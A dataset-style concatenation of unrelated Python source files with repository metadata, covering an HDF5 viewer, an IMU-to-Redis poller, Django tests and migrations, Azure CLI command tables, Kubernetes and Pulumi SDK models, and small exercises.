#self.connect(self.wbut.but_save, QtCore.SIGNAL('clicked()'), self.on_but_save)
def set_tool_tips(self):
self.setToolTip('hdf5 explorer')
def set_style(self):
self.setGeometry(50, 50, 500, 600)
self.layout().setContentsMargins(0,0,0,0)
self.wctrl.setFixedHeight(50)
def closeEvent(self, e):
QWidget.closeEvent(self, e)
cp.h5vmain = None
def hdf5explorer(**kwargs):
import os
os.environ['LIBGL_ALWAYS_INDIRECT'] = '1'
#fmt = '%(asctime)s %(name)s %(levelname)s: %(message)s'
#logging.basicConfig(format=fmt, datefmt='%H:%M:%S', level=logging.DEBUG)
a = QApplication(sys.argv)
w = H5VMain(**kwargs)
w.setGeometry(10, 25, 900, 700)
w.setWindowTitle('HDF5 explorer')
w.move(50,20)
w.show()
a.exec_()
del w
del a
if __name__ == "__main__":
import os
kwargs = {\
'fname':'/reg/g/psdm/detector/calib/jungfrau/jungfrau-171113-154920171025-3d00fb.h5',\
'loglevel':'INFO',\
'logdir':'%s/hdf5explorer-log' % os.path.expanduser('~'),\
'savelog':True}
hdf5explorer(**kwargs)
# EOF
| 27.84252
| 97
| 0.643382
|
acff635a9356376981eb427f1dadbfbaf1960627
| 284
|
py
|
Python
|
spinta/backends/mongo/commands/wait.py
|
atviriduomenys/spinta
|
77a10e201f8cdc63143fce7996fd0898acb1ff58
|
[
"MIT"
] | 2
|
2019-03-14T06:41:14.000Z
|
2019-03-26T11:48:14.000Z
|
spinta/backends/mongo/commands/wait.py
|
sirex/spinta
|
77a10e201f8cdc63143fce7996fd0898acb1ff58
|
[
"MIT"
] | 44
|
2019-04-05T15:52:45.000Z
|
2022-03-30T07:41:33.000Z
|
spinta/backends/mongo/commands/wait.py
|
sirex/spinta
|
77a10e201f8cdc63143fce7996fd0898acb1ff58
|
[
"MIT"
] | 1
|
2019-04-01T09:54:27.000Z
|
2019-04-01T09:54:27.000Z
|
from spinta import commands
from spinta.components import Context
from spinta.backends.mongo.components import Mongo
@commands.wait.register(Context, Mongo)
def wait(context: Context, backend: Mongo, *, fail: bool = False) -> bool:
# TODO: Implement real check.
return True
| 28.4
| 74
| 0.757042
|
acff644eecaed3792f8b009bc35d4cc81fbf76c1
| 1,549
|
py
|
Python
|
gps_tracker/imu_poller.py
|
jaluebbe/GPSTracker
|
987505d80b141feaf1dc9a8a7568d3a531c8c337
|
[
"MIT"
] | 7
|
2020-09-16T14:24:25.000Z
|
2021-11-02T00:19:37.000Z
|
gps_tracker/imu_poller.py
|
jaluebbe/GPSTracker
|
987505d80b141feaf1dc9a8a7568d3a531c8c337
|
[
"MIT"
] | null | null | null |
gps_tracker/imu_poller.py
|
jaluebbe/GPSTracker
|
987505d80b141feaf1dc9a8a7568d3a531c8c337
|
[
"MIT"
] | 4
|
2020-08-20T14:21:27.000Z
|
2021-05-15T02:31:05.000Z
|
#!/usr/bin/env python3
import time
import math
import json
import socket
import redis
import RTIMU
import os.path
import logging
redis_connection = redis.Redis()
hostname = socket.gethostname()
SETTINGS_FILE = "/home/pi/GPSTracker/gps_tracker/RTIMULib"
logging.info("Using settings file " + SETTINGS_FILE + ".ini")
if not os.path.exists(SETTINGS_FILE + ".ini"):
logging.warning("Settings file does not exist, will be created")
s = RTIMU.Settings(SETTINGS_FILE)
imu = RTIMU.RTIMU(s)
logging.info("IMU Name: " + imu.IMUName())
if not imu.IMUInit():
logging.error("IMU Init Failed")
exit(1)
else:
logging.info("IMU Init Succeeded")
# this is a good time to set any fusion parameters
imu.setSlerpPower(0.02)
imu.setGyroEnable(True)
imu.setAccelEnable(True)
imu.setCompassEnable(False)
poll_interval = imu.IMUGetPollInterval()
logging.info("Recommended Poll Interval: %dmS\n" % poll_interval)
def poll_imu(counter=0):
if imu.IMURead():
timestamp = time.time()
fusion_data = imu.getFusionData()
sensor_data = {
"hostname": hostname,
"i_utc": round(timestamp, 2),
"roll": round(math.degrees(fusion_data[0]), 1),
"pitch": round(math.degrees(fusion_data[1]), 1),
}
if counter % 20 == 0:
redis_connection.publish("imu", json.dumps(sensor_data))
return counter + 1
return counter
if __name__ == "__main__":
counter = 0
while True:
counter = poll_imu(counter)
time.sleep(poll_interval / 1e3)
| 24.587302
| 68
| 0.672046
|
acff644ffa6634f204877086a03c7e8b4d2271b4
| 3,032
|
py
|
Python
|
tests/applications/test_forms.py
|
crydotsnake/djangogirls
|
0e764294085d6d7d3c4f61a7fe36f91640abedcd
|
[
"BSD-3-Clause"
] | 446
|
2015-01-04T20:58:26.000Z
|
2022-03-30T23:08:26.000Z
|
tests/applications/test_forms.py
|
serenasensini/TheRedCode_Docker-per-Django-e-Postgres
|
78a2ca1f09ab956a6936d14a5fd99336ff39f472
|
[
"BSD-3-Clause"
] | 649
|
2015-01-09T23:42:14.000Z
|
2022-03-31T17:27:19.000Z
|
tests/applications/test_forms.py
|
serenasensini/TheRedCode_Docker-per-Django-e-Postgres
|
78a2ca1f09ab956a6936d14a5fd99336ff39f472
|
[
"BSD-3-Clause"
] | 319
|
2015-01-06T20:58:42.000Z
|
2022-03-30T06:29:04.000Z
|
import pytest
import vcr
from applications.forms import ApplicationForm
from applications.models import Application, Form, Question
from core.models import Event
@pytest.mark.django_db
@vcr.use_cassette('tests/applications/vcr/application_form_prevent_duplicate_emails.yaml')
def test_application_form_prevent_duplicate_emails():
event = Event.objects.create(
name='Test', city='Test', country='Test',
is_page_live=True, page_url='test'
)
form = Form.objects.create(event=event)
# Override default questions, we need just the e-mail
form.question_set.all().delete()
question = Question.objects.create(
title="Your e-mail address:",
question_type="email",
form=form,
order=1
)
assert Application.objects.count() == 0
form_data = {
'newsletter_optin': 'yes',
'g-recaptcha-response': 'PASSED',
f'question_{question.pk}': 'test@test.pl'
}
application_form = ApplicationForm(form_data, form=form)
assert application_form.is_valid()
application_form.save()
assert Application.objects.count() == 1
application = Application.objects.get()
assert application.newsletter_optin is True
application_form = ApplicationForm(form_data, form=form)
assert not application_form.is_valid()
@pytest.mark.django_db
@vcr.use_cassette('tests/applications/vcr/application_form_prevent_duplicate_emails.yaml')
def test_application_form_no_newsletter():
event = Event.objects.create(
name='Test', city='Test', country='Test',
is_page_live=True, page_url='test')
form = Form.objects.create(event=event)
# Override default questions, we need just the e-mail
form.question_set.all().delete()
question = Question.objects.create(
title="Your e-mail address:",
question_type="email",
form=form,
order=1)
assert Application.objects.count() == 0
form_data = {
'newsletter_optin': 'no',
'g-recaptcha-response': 'PASSED',
f'question_{question.pk}': 'test@test.pl'
}
application_form = ApplicationForm(form_data, form=form)
assert application_form.is_valid()
application_form.save()
assert Application.objects.count() == 1
application = Application.objects.get()
assert application.newsletter_optin is False
@pytest.mark.django_db
@vcr.use_cassette('tests/applications/vcr/application_form_prevent_duplicate_emails.yaml')
def test_application_form_no_questions():
event = Event.objects.create(
name='Test', city='Test', country='Test',
is_page_live=True, page_url='test')
form = Form.objects.create(event=event)
# Override default questions, we need just the e-mail
form.question_set.all().delete()
assert Application.objects.count() == 0
form_data = {
'newsletter_optin': 'yes',
'g-recaptcha-response': 'PASSED'
}
application_form = ApplicationForm(form_data, form=form)
assert application_form.is_valid()
| 30.32
| 90
| 0.697559
|
acff64bbd68dc318b01578e2bfb76fe0c7669778
| 836
|
py
|
Python
|
cryptkeeper/db/schema/smithandcrown.py
|
CMoncur/cryptkeeper
|
ed4d1da68b51b817fa8fe29a31901a150f13dfcd
|
[
"MIT"
] | null | null | null |
cryptkeeper/db/schema/smithandcrown.py
|
CMoncur/cryptkeeper
|
ed4d1da68b51b817fa8fe29a31901a150f13dfcd
|
[
"MIT"
] | null | null | null |
cryptkeeper/db/schema/smithandcrown.py
|
CMoncur/cryptkeeper
|
ed4d1da68b51b817fa8fe29a31901a150f13dfcd
|
[
"MIT"
] | null | null | null |
# pylint: disable=R0903
"""Smith and Crown SqlAlchemy Schema"""
from datetime import datetime
from sqlalchemy import Column, Integer, String, TEXT, TIMESTAMP
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class SmithAndCrown(Base):
"""Smith and Crown Schema"""
__tablename__ = "smithandcrown"
id = Column( Integer, primary_key = True, autoincrement = True )
created = Column( TIMESTAMP, nullable = False, default = datetime.now )
name = Column( String(100), nullable = False, unique = True )
start = Column( TIMESTAMP, nullable = False )
end = Column( TIMESTAMP, nullable = False )
site = Column( String(200), nullable = False )
description = Column( TEXT, nullable = False )
raised = Column( Integer, nullable = True )
token_symbol = Column( String(20), nullable = False )
| 34.833333
| 73
| 0.722488
|
acff64ecc0ad4bde42b2c82635e0d7863eb1eac4
| 397
|
py
|
Python
|
nablapps/events/migrations/0006_remove_event_view_counter.py
|
Amund211/nablaweb
|
8105c34615d4b67637e982545fbc6489a131c1f3
|
[
"MIT"
] | 17
|
2019-10-07T15:10:58.000Z
|
2022-01-21T14:18:07.000Z
|
nablapps/events/migrations/0006_remove_event_view_counter.py
|
Amund211/nablaweb
|
8105c34615d4b67637e982545fbc6489a131c1f3
|
[
"MIT"
] | 222
|
2019-10-07T15:04:51.000Z
|
2022-03-24T12:14:16.000Z
|
nablapps/events/migrations/0006_remove_event_view_counter.py
|
Amund211/nablaweb
|
8105c34615d4b67637e982545fbc6489a131c1f3
|
[
"MIT"
] | 7
|
2019-10-10T18:53:42.000Z
|
2021-10-18T02:13:09.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-26 13:50
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("events", "0005_auto_20171017_0110"),
]
operations = [
migrations.RemoveField(
model_name="event",
name="view_counter",
),
]
| 19.85
| 48
| 0.617128
|
acff6594689f05ecaca9ecced1976f55b71c2023
| 5,601
|
py
|
Python
|
src/dataprotection/azext_dataprotection/generated/commands.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | null | null | null |
src/dataprotection/azext_dataprotection/generated/commands.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | 9
|
2022-03-25T19:35:49.000Z
|
2022-03-31T06:09:47.000Z
|
src/dataprotection/azext_dataprotection/generated/commands.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | 1
|
2022-03-10T22:13:02.000Z
|
2022-03-10T22:13:02.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=bad-continuation
# pylint: disable=line-too-long
from azure.cli.core.commands import CliCommandType
from azext_dataprotection.generated._client_factory import (
cf_backup_vault,
cf_backup_policy,
cf_backup_instance,
cf_recovery_point,
cf_job,
cf_restorable_time_range,
)
dataprotection_backup_vault = CliCommandType(
operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._backup_vaults_operations#BackupVaultsOperations.{}',
client_factory=cf_backup_vault,
)
dataprotection_backup_policy = CliCommandType(
operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._backup_policies_operations#BackupPoliciesOperations.{}',
client_factory=cf_backup_policy,
)
dataprotection_backup_instance = CliCommandType(
operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._backup_instances_operations#BackupInstancesOperations.{}',
client_factory=cf_backup_instance,
)
dataprotection_recovery_point = CliCommandType(
operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._recovery_points_operations#RecoveryPointsOperations.{}',
client_factory=cf_recovery_point,
)
dataprotection_job = CliCommandType(
operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._jobs_operations#JobsOperations.{}',
client_factory=cf_job,
)
dataprotection_restorable_time_range = CliCommandType(
operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._restorable_time_ranges_operations#RestorableTimeRangesOperations.{}',
client_factory=cf_restorable_time_range,
)
def load_command_table(self, _):
with self.command_group(
'dataprotection backup-vault', dataprotection_backup_vault, client_factory=cf_backup_vault
) as g:
g.custom_show_command('show', 'dataprotection_backup_vault_show')
g.custom_command('create', 'dataprotection_backup_vault_create', supports_no_wait=True)
g.custom_command('update', 'dataprotection_backup_vault_update', supports_no_wait=True)
g.custom_command('delete', 'dataprotection_backup_vault_delete', confirmation=True)
g.custom_wait_command('wait', 'dataprotection_backup_vault_show')
with self.command_group(
'dataprotection backup-policy', dataprotection_backup_policy, client_factory=cf_backup_policy
) as g:
g.custom_command('list', 'dataprotection_backup_policy_list')
g.custom_show_command('show', 'dataprotection_backup_policy_show')
g.custom_command('create', 'dataprotection_backup_policy_create')
g.custom_command('delete', 'dataprotection_backup_policy_delete', confirmation=True)
with self.command_group(
'dataprotection backup-instance', dataprotection_backup_instance, client_factory=cf_backup_instance
) as g:
g.custom_command('list', 'dataprotection_backup_instance_list')
g.custom_show_command('show', 'dataprotection_backup_instance_show')
g.custom_command('create', 'dataprotection_backup_instance_create', supports_no_wait=True)
g.custom_command('delete', 'dataprotection_backup_instance_delete', supports_no_wait=True, confirmation=True)
g.custom_command('adhoc-backup', 'dataprotection_backup_instance_adhoc_backup', supports_no_wait=True)
g.custom_command('restore trigger', 'dataprotection_backup_instance_restore_trigger', supports_no_wait=True)
g.custom_command('resume-protection', 'dataprotection_backup_instance_resume_protection', supports_no_wait=True)
g.custom_command('stop-protection', 'dataprotection_backup_instance_stop_protection', supports_no_wait=True)
g.custom_command('suspend-backup', 'dataprotection_backup_instance_suspend_backup', supports_no_wait=True)
g.custom_command(
'validate-for-backup', 'dataprotection_backup_instance_validate_for_backup', supports_no_wait=True
)
g.custom_command(
'validate-for-restore', 'dataprotection_backup_instance_validate_for_restore', supports_no_wait=True
)
g.custom_wait_command('wait', 'dataprotection_backup_instance_show')
with self.command_group(
'dataprotection recovery-point', dataprotection_recovery_point, client_factory=cf_recovery_point
) as g:
g.custom_command('list', 'dataprotection_recovery_point_list')
g.custom_show_command('show', 'dataprotection_recovery_point_show')
with self.command_group('dataprotection job', dataprotection_job, client_factory=cf_job) as g:
g.custom_command('list', 'dataprotection_job_list')
g.custom_show_command('show', 'dataprotection_job_show')
with self.command_group(
'dataprotection restorable-time-range',
dataprotection_restorable_time_range,
client_factory=cf_restorable_time_range,
) as g:
g.custom_command('find', 'dataprotection_restorable_time_range_find')
with self.command_group('dataprotection', is_experimental=True):
pass
| 46.675
| 152
| 0.764328
|
acff66604b8ef3e02411c18993d0a43944f3dec8
| 2,359
|
py
|
Python
|
src/crop_head_bbox.py
|
anhnt170489/FunMOT
|
6eb794bd485be42270eaee3804e13d38a897a945
|
[
"MIT"
] | null | null | null |
src/crop_head_bbox.py
|
anhnt170489/FunMOT
|
6eb794bd485be42270eaee3804e13d38a897a945
|
[
"MIT"
] | null | null | null |
src/crop_head_bbox.py
|
anhnt170489/FunMOT
|
6eb794bd485be42270eaee3804e13d38a897a945
|
[
"MIT"
] | 1
|
2021-11-09T02:50:19.000Z
|
2021-11-09T02:50:19.000Z
|
import os
import argparse
import cv2
from tqdm import tqdm
import numpy as np
import traceback
def convert_full_to_head(bbox, h, w):
cy = bbox[:, 3]
ch = bbox[:, 5]
cw = bbox[:, 4]
new_cy = cy - ch/2 + (cw/2*w/h)
new_h = cw*w/h
bbox[:, 3] = new_cy
bbox[:, 5] = new_h
return bbox
if __name__ == "__main__":
parser = argparse.ArgumentParser("Convert Full body annotation to head-shoulder annotation")
parser.add_argument('--full', type=str, required=True, help="Folder contain body annotation")
parser.add_argument('--image', type=str, help="Folder contain images")
parser.add_argument('--image_ext', type=str, default="jpg", help="Image extension")
parser.add_argument('--height', type=int, help="Image height if constant")
parser.add_argument('--width', type=int, help="Image width if constant")
parser.add_argument('--out', type=str, required=True, help="Output annotation for cropped head")
args = parser.parse_args()
assert args.image is not None or (args.height is not None and args.width is not None)
if not os.path.isdir(args.out):
os.makedirs(args.out)
try:
for root, dirs, files in tqdm(os.walk(args.full)):
for dirname in dirs:
relpath = os.path.relpath(root, args.full)
outfolder = os.path.join(args.out, relpath, dirname)
if not os.path.isdir(outfolder):
os.makedirs(outfolder)
for filename in files:
gt = np.loadtxt(os.path.join(root, filename)).reshape((-1, 6))
relpath = os.path.relpath(root, args.full)
if args.height is None or args.width is None:
img_path = os.path.splitext(filename)[0] + "." + args.image_ext
img_path = os.path.join(args.image, relpath, img_path)
img = cv2.imread(img_path)
h, w = img.shape[:2]
else:
h = args.height
w = args.width
head = convert_full_to_head(gt, h, w)
np.savetxt(os.path.join(args.out, relpath, filename), head, fmt='%d %d %.6f %.6f %.6f %.6f')
except:
# print(root, dirname, filename)
# print(img_path)
traceback.print_exc()
| 35.208955
| 108
| 0.578211
|
acff68bc0100ce10fd240863497f835f746bd780
| 75
|
py
|
Python
|
udemy/python-video-workbook/my_progress/019.py
|
djrgit/coursework
|
2a91da9b76cb1acbd12f3d8049f15d2e71f475a1
|
[
"MIT"
] | null | null | null |
udemy/python-video-workbook/my_progress/019.py
|
djrgit/coursework
|
2a91da9b76cb1acbd12f3d8049f15d2e71f475a1
|
[
"MIT"
] | null | null | null |
udemy/python-video-workbook/my_progress/019.py
|
djrgit/coursework
|
2a91da9b76cb1acbd12f3d8049f15d2e71f475a1
|
[
"MIT"
] | 3
|
2018-08-13T23:14:22.000Z
|
2019-01-11T22:50:07.000Z
|
# Exercise 19 - Add Dictionary Key
d = {"a": 1, "b": 2}
d['c'] = 3
print(d)
| 18.75
| 34
| 0.533333
|
acff69da4e5a35b9943277a3d65ea8075b119b9e
| 287
|
py
|
Python
|
torch/_lazy/config.py
|
lkct/pytorch
|
ec62901a2c38b63d12843e0f079bdeb7644d8714
|
[
"Intel"
] | 1
|
2022-02-01T18:50:09.000Z
|
2022-02-01T18:50:09.000Z
|
torch/_lazy/config.py
|
ellhe-blaster/pytorch
|
e5282c3cb8bf6ad8c5161f9d0cc271edb9abed25
|
[
"Intel"
] | null | null | null |
torch/_lazy/config.py
|
ellhe-blaster/pytorch
|
e5282c3cb8bf6ad8c5161f9d0cc271edb9abed25
|
[
"Intel"
] | null | null | null |
import torch._C._lazy
def get_force_fallback():
"""Get the config used to force LTC fallback"""
return torch._C._lazy._get_force_fallback()
def set_force_fallback(configval):
"""Set the config used to force LTC fallback"""
torch._C._lazy._set_force_fallback(configval)
| 28.7
| 51
| 0.745645
|
acff6af186427d83aa1eead205283923331384c2
| 658
|
py
|
Python
|
Python/hourCmp.py
|
jayyok/ensiie-P
|
6739c8478a0631c4c0966aad74d379df12e0bada
|
[
"Apache-2.0"
] | null | null | null |
Python/hourCmp.py
|
jayyok/ensiie-P
|
6739c8478a0631c4c0966aad74d379df12e0bada
|
[
"Apache-2.0"
] | null | null | null |
Python/hourCmp.py
|
jayyok/ensiie-P
|
6739c8478a0631c4c0966aad74d379df12e0bada
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
def timeCmp(h1,m1,s1,h2,m2,s2):
h1Sec = h1 * 3600 + m1 * 60 + s1
h2Sec = h2 * 3600 + m2 * 60 + s2
diff = h2Sec - h1Sec
if(diff>0):
print('Resultat :' + str(int(diff/3600)) + ':' + str(int(diff%3600/60)) + ':' + str(int(diff%3600%60)) + ':')
else:
print('Resultat : - ' + str(int(diff/3600)) + ':' + str(int(diff%3600/60)) + ':' + str(int(diff%3600%60)) + ':')
h1 = int(input())
m1 = int(input())
s1 = int(input())
h2 = int(input())
m2 = int(input())
s2 = int(input())
print('H1' + str(h1) + ':' + str(m1) + ':' + str(s1))
print('H2' + str(h2) + ':' + str(m2) + ':' + str(s2))
# Appel de la fct
timeCmp(h1,m1,s1,h2,m2,s2)
| 23.5
| 114
| 0.527356
|
acff6c396b326795277b3c8874f4552b02278335
| 391
|
py
|
Python
|
books/mylibrary/grids.py
|
agiliq/django-datagrid
|
0ab533b93f014b8fba6e9c4daddbcd5b7f31b9c9
|
[
"MIT"
] | 6
|
2015-03-19T15:14:52.000Z
|
2018-09-30T05:03:16.000Z
|
books/mylibrary/grids.py
|
agiliq/django-datagrid
|
0ab533b93f014b8fba6e9c4daddbcd5b7f31b9c9
|
[
"MIT"
] | null | null | null |
books/mylibrary/grids.py
|
agiliq/django-datagrid
|
0ab533b93f014b8fba6e9c4daddbcd5b7f31b9c9
|
[
"MIT"
] | 8
|
2015-02-13T02:31:48.000Z
|
2021-11-11T20:36:46.000Z
|
from datagrid.grids import DataGrid, Column, NonDatabaseColumn
class SimpleGrid(DataGrid):
name = NonDatabaseColumn("Hello")
class RealGrid(DataGrid):
name = Column()
publisher = Column()
recommended_by = Column()
class SortableGrid(DataGrid):
name = Column(sortable = True)
publisher = Column(sortable = True)
recommended_by = Column(sortable = True)
| 26.066667
| 62
| 0.703325
|
acff6c59c6c17490d7dad60940c58bec29e9b5ee
| 437
|
py
|
Python
|
World 2/Exercise 60.py
|
NikiReis/Python--Exercises
|
2f50a3cd6900cec024edcf1a812d1cd86afcdea1
|
[
"MIT"
] | null | null | null |
World 2/Exercise 60.py
|
NikiReis/Python--Exercises
|
2f50a3cd6900cec024edcf1a812d1cd86afcdea1
|
[
"MIT"
] | null | null | null |
World 2/Exercise 60.py
|
NikiReis/Python--Exercises
|
2f50a3cd6900cec024edcf1a812d1cd86afcdea1
|
[
"MIT"
] | null | null | null |
#first option
number = int(input("Type a value to calcule the factorial: "))
count = number
position = count
while count > 1:
count -= 1
number = number * count
print("The factorial of {} is: {}".format(position,number))
#second option
from math import factorial
number = int(input("Type a value to calcule the factorial: "))
result = factorial(number)
print("The factorial of {} is: {}".format(number,result))
| 21.85
| 62
| 0.675057
|
acff6d8930e882dde3c7ed109a66ff940dc3447b
| 5,855
|
py
|
Python
|
kubernetes/client/models/v1alpha1_non_resource_policy_rule.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 2
|
2021-03-09T12:42:05.000Z
|
2021-03-09T13:27:50.000Z
|
kubernetes/client/models/v1alpha1_non_resource_policy_rule.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 7
|
2021-04-13T03:04:42.000Z
|
2022-03-02T03:10:18.000Z
|
kubernetes/client/models/v1alpha1_non_resource_policy_rule.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 1
|
2021-06-13T09:21:37.000Z
|
2021-06-13T09:21:37.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.17
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1alpha1NonResourcePolicyRule(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'non_resource_ur_ls': 'list[str]',
'verbs': 'list[str]'
}
attribute_map = {
'non_resource_ur_ls': 'nonResourceURLs',
'verbs': 'verbs'
}
def __init__(self, non_resource_ur_ls=None, verbs=None, local_vars_configuration=None): # noqa: E501
"""V1alpha1NonResourcePolicyRule - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._non_resource_ur_ls = None
self._verbs = None
self.discriminator = None
self.non_resource_ur_ls = non_resource_ur_ls
self.verbs = verbs
@property
def non_resource_ur_ls(self):
"""Gets the non_resource_ur_ls of this V1alpha1NonResourcePolicyRule. # noqa: E501
`nonResourceURLs` is a set of url prefixes that a user should have access to and may not be empty. For example: - \"/healthz\" is legal - \"/hea*\" is illegal - \"/hea\" is legal but matches nothing - \"/hea/*\" also matches nothing - \"/healthz/*\" matches all per-component health checks. \"*\" matches all non-resource urls. if it is present, it must be the only entry. Required. # noqa: E501
:return: The non_resource_ur_ls of this V1alpha1NonResourcePolicyRule. # noqa: E501
:rtype: list[str]
"""
return self._non_resource_ur_ls
@non_resource_ur_ls.setter
def non_resource_ur_ls(self, non_resource_ur_ls):
"""Sets the non_resource_ur_ls of this V1alpha1NonResourcePolicyRule.
`nonResourceURLs` is a set of url prefixes that a user should have access to and may not be empty. For example: - \"/healthz\" is legal - \"/hea*\" is illegal - \"/hea\" is legal but matches nothing - \"/hea/*\" also matches nothing - \"/healthz/*\" matches all per-component health checks. \"*\" matches all non-resource urls. if it is present, it must be the only entry. Required. # noqa: E501
:param non_resource_ur_ls: The non_resource_ur_ls of this V1alpha1NonResourcePolicyRule. # noqa: E501
:type: list[str]
"""
if self.local_vars_configuration.client_side_validation and non_resource_ur_ls is None: # noqa: E501
raise ValueError("Invalid value for `non_resource_ur_ls`, must not be `None`") # noqa: E501
self._non_resource_ur_ls = non_resource_ur_ls
@property
def verbs(self):
"""Gets the verbs of this V1alpha1NonResourcePolicyRule. # noqa: E501
`verbs` is a list of matching verbs and may not be empty. \"*\" matches all verbs. If it is present, it must be the only entry. Required. # noqa: E501
:return: The verbs of this V1alpha1NonResourcePolicyRule. # noqa: E501
:rtype: list[str]
"""
return self._verbs
@verbs.setter
def verbs(self, verbs):
"""Sets the verbs of this V1alpha1NonResourcePolicyRule.
`verbs` is a list of matching verbs and may not be empty. \"*\" matches all verbs. If it is present, it must be the only entry. Required. # noqa: E501
:param verbs: The verbs of this V1alpha1NonResourcePolicyRule. # noqa: E501
:type: list[str]
"""
if self.local_vars_configuration.client_side_validation and verbs is None: # noqa: E501
raise ValueError("Invalid value for `verbs`, must not be `None`") # noqa: E501
self._verbs = verbs
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1NonResourcePolicyRule):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha1NonResourcePolicyRule):
return True
return self.to_dict() != other.to_dict()
| 38.267974
| 414
| 0.629547
|
acff6e61fb3af76739b2210c352c27f8d7c6d8b9
| 32,102
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200301/vpn_connection.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200301/vpn_connection.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200301/vpn_connection.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VpnConnectionArgs', 'VpnConnection']
@pulumi.input_type
class VpnConnectionArgs:
def __init__(__self__, *,
gateway_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
connection_bandwidth: Optional[pulumi.Input[int]] = None,
connection_name: Optional[pulumi.Input[str]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_internet_security: Optional[pulumi.Input[bool]] = None,
enable_rate_limiting: Optional[pulumi.Input[bool]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
remote_vpn_site: Optional[pulumi.Input['SubResourceArgs']] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
vpn_connection_protocol_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
vpn_link_connections: Optional[pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]]] = None):
"""
The set of arguments for constructing a VpnConnection resource.
:param pulumi.Input[str] gateway_name: The name of the gateway.
:param pulumi.Input[str] resource_group_name: The resource group name of the VpnGateway.
:param pulumi.Input[int] connection_bandwidth: Expected bandwidth in MBPS.
:param pulumi.Input[str] connection_name: The name of the connection.
:param pulumi.Input[int] dpd_timeout_seconds: The dead peer detection timeout for a vpn connection in seconds.
:param pulumi.Input[bool] enable_bgp: EnableBgp flag.
:param pulumi.Input[bool] enable_internet_security: Enable internet security.
:param pulumi.Input[bool] enable_rate_limiting: EnableBgp flag.
:param pulumi.Input[str] id: Resource ID.
